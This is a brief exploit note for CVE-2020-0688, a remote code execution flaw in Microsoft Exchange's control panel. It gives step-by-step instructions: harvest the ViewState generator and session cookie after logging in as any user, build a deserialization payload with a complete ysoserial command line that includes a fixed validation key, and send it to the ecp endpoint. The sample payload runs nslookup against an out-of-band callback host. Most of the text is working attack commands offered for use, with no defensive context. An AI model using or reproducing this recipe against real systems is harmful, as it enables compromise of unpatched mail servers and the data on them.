cve-2020-0688
Login with a user with an email address privliage is nothing to worry about.
Grab - __VIEWSTATEGENERATOR from page source
Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
GET TO:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
The Exploit.py is untested and need a demo system to fire up and play with.